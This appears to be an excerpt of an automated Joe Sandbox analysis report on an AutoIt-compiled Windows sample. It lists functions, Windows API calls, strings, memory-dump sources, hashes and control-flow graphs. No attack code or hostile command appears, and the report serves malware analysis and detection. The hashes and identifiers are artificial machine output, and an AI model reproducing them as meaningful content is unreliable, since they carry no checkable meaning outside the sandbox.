                                                                        Function 0040D6B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                        • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: FreeInfoLibraryParametersSystem
                                                                        • String ID: Wu
                                                                        • API String ID: 3403648963-4083010176
                                                                        • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                        • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                        • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                        • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                        Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                        • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                        • TranslateMessage.USER32(?), ref: 00409556
                                                                        • DispatchMessageW.USER32(?), ref: 00409561
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Peek$DispatchSleepTranslate
                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                        • API String ID: 1762048999-758534266
                                                                        • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                        • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                        • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                        • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                                                        Function 00401F20 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 214COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • __wcsicoll.LIBCMT ref: 00402007
                                                                        • __wcsicoll.LIBCMT ref: 0040201D
                                                                        • __wcsicoll.LIBCMT ref: 00402033
                                                                          • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                        • __wcsicoll.LIBCMT ref: 00402049
                                                                        • _wcscpy.LIBCMT ref: 0040207C
                                                                        • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                                        • API String ID: 3948761352-1609664196
                                                                        • Opcode ID: 0d20ff72191698bd90ee1a3448f6007b9494b4216ad1560248775c19b8461813
                                                                        • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                        • Opcode Fuzzy Hash: 0d20ff72191698bd90ee1a3448f6007b9494b4216ad1560248775c19b8461813
                                                                        • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                                                        Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                        • __wsplitpath.LIBCMT ref: 0040E41C
                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                        • _wcsncat.LIBCMT ref: 0040E433
                                                                        • __wmakepath.LIBCMT ref: 0040E44F
                                                                          • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                        • _wcscpy.LIBCMT ref: 0040E487
                                                                          • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                        • _wcscat.LIBCMT ref: 00427541
                                                                        • _wcslen.LIBCMT ref: 00427551
                                                                        • _wcslen.LIBCMT ref: 00427562
                                                                        • _wcscat.LIBCMT ref: 0042757C
                                                                        • _wcsncpy.LIBCMT ref: 004275BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                        • String ID: Include$\
                                                                        • API String ID: 3173733714-3429789819
                                                                        • Opcode ID: f7b2e8dd37dad95b873b636539c9fa9ee4ced90e3c163691215c383b9fb11936
                                                                        • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                        • Opcode Fuzzy Hash: f7b2e8dd37dad95b873b636539c9fa9ee4ced90e3c163691215c383b9fb11936
                                                                        • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                                                        Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • _fseek.LIBCMT ref: 0045292B
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                        • __fread_nolock.LIBCMT ref: 00452961
                                                                        • __fread_nolock.LIBCMT ref: 00452971
                                                                        • __fread_nolock.LIBCMT ref: 0045298A
                                                                        • __fread_nolock.LIBCMT ref: 004529A5
                                                                        • _fseek.LIBCMT ref: 004529BF
                                                                        • _malloc.LIBCMT ref: 004529CA
                                                                        • _malloc.LIBCMT ref: 004529D6
                                                                        • __fread_nolock.LIBCMT ref: 004529E7
                                                                        • _free.LIBCMT ref: 00452A17
                                                                        • _free.LIBCMT ref: 00452A20
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                        • String ID:
                                                                        • API String ID: 1255752989-0
                                                                        • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                        • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                        • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                        • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                                                        Function 00452719 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 147COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __fread_nolock$_fseek_wcscpy
                                                                        • String ID: FILE
                                                                        • API String ID: 3888824918-3121273764
                                                                        • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                        • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                        • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                        • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                                                        Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                        • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                        • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                        • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                        • ImageList_ReplaceIcon.COMCTL32(00AB14B8,000000FF,00000000), ref: 00410552
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                        • API String ID: 2914291525-1005189915
                                                                        • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                        • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                        • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                        • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                                                        Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                        • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                        • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                        • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                        • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                        • RegisterClassExW.USER32(?), ref: 0041045D
                                                                          • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                          • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                          • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                          • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                          • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                          • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                          • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00AB14B8,000000FF,00000000), ref: 00410552
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                        • String ID: #$0$AutoIt v3
                                                                        • API String ID: 423443420-4155596026
                                                                        • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                        • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                        • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                        • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                        Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _malloc
                                                                        • String ID: Default
                                                                        • API String ID: 1579825452-753088835
                                                                        • Opcode ID: ad9c003b1f2fa77121fbfcba884144bd1a02cdd9abf6dd606c80e641f461d2b6
                                                                        • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                        • Opcode Fuzzy Hash: ad9c003b1f2fa77121fbfcba884144bd1a02cdd9abf6dd606c80e641f461d2b6
                                                                        • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                                                        Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2036 40f5c0-40f5cf call 422240 2039 40f5d0-40f5e8 2036->2039 2039->2039 2040 40f5ea-40f613 call 413650 call 410e60 2039->2040 2045 40f614-40f633 call 414d04 2040->2045 2048 40f691 2045->2048 2049 40f635-40f63c 2045->2049 2052 40f696-40f69c 2048->2052 2050 40f660-40f674 call 4150d1 2049->2050 2051 40f63e 2049->2051 2056 40f679-40f67c 2050->2056 2053 40f640 2051->2053 2055 40f642-40f650 2053->2055 2057 40f652-40f655 2055->2057 2058 40f67e-40f68c 2055->2058 2056->2045 2059 40f65b-40f65e 2057->2059 2060 425d1e-425d3e call 4150d1 call 414d04 2057->2060 2061 40f68e-40f68f 2058->2061 2062 40f69f-40f6ad 2058->2062 2059->2050 2059->2053 2073 425d43-425d5f call 414d30 2060->2073 2061->2057 2064 40f6b4-40f6c2 2062->2064 2065 40f6af-40f6b2 2062->2065 2066 425d16 2064->2066 2067 40f6c8-40f6d6 2064->2067 2065->2057 2066->2060 2069 425d05-425d0b 2067->2069 2070 40f6dc-40f6df 2067->2070 2069->2055 2072 425d11 2069->2072 2070->2057 2072->2066 2073->2052
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __fread_nolock_fseek_memmove_strcat
                                                                        • String ID: AU3!$EA06
                                                                        • API String ID: 1268643489-2658333250
                                                                        • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                        • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                        • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                        • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                                                        Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2076 401100-401111 2077 401113-401119 2076->2077 2078 401179-401180 2076->2078 2080 401144-40114a 2077->2080 2081 40111b-40111e 2077->2081 2078->2077 2079 401182 2078->2079 2082 40112c-401141 DefWindowProcW 2079->2082 2084 401184-40118e call 401250 2080->2084 2085 40114c-40114f 2080->2085 2081->2080 2083 401120-401126 2081->2083 2083->2082 2089 42b038-42b03f 2083->2089 2093 401193-40119a 2084->2093 2086 401151-401157 2085->2086 2087 40119d 2085->2087 2090 401219-40121f 2086->2090 2091 40115d 2086->2091 2094 4011a3-4011a9 2087->2094 2095 42afb4-42afc5 call 40f190 2087->2095 2089->2082 2092 42b045-42b059 call 401000 call 40e0c0 2089->2092 2090->2083 2098 401225-42b06d call 468b0e 2090->2098 2096 401163-401166 2091->2096 2097 42b01d-42b024 2091->2097 2092->2082 2094->2083 2101 4011af 2094->2101 2095->2093 2103 42afe9-42b018 call 40f190 call 401a50 2096->2103 2104 40116c-401172 2096->2104 2097->2082 2102 42b02a-42b033 call 4370f4 2097->2102 2098->2093 2101->2083 2108 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2101->2108 2109 4011db-401202 SetTimer RegisterWindowMessageW 2101->2109 2102->2082 2103->2082 2104->2083 2112 401174-42afde call 45fd57 2104->2112 2109->2093 2110 401204-401216 CreatePopupMenu 2109->2110 2112->2082 2127 42afe4 2112->2127 2127->2093
                                                                        APIs
                                                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                        • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                        • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                        • CreatePopupMenu.USER32 ref: 00401204
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                        • String ID: TaskbarCreated
                                                                        • API String ID: 129472671-2362178303
                                                                        • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                        • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                        • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
